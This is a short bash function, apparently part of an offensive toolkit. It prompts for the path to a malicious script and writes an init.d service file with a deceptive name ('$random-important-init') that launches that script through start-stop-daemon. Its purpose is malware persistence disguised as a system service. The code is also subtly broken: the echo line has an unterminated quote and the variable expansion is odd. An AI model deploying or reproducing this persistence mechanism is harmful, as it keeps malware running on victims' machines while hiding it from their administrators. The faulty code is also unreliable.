#!/usr/bin/env bash

# --- all vars are exported in main script line:71 --- 
# shellcheck disable=SC2154

mal_int(){
    read -rp $'\033[0;91m[*]\e[0m Enter path to your script > ' mal_file_path
    cat << EOF > "/etc/init.d/$random-important-init"
#!/bin/sh

start_daemon() {
    start-stop-daemon --start --pidfile /var/run/init-daemon.pid --exec "\$$mal_file_path" || { echo -e "\n${RED}[x]${EOC} Cannot add custom return 1 }
}

case "\$1" in
  start)
    start_daemon
    ;;
esac
EOF

}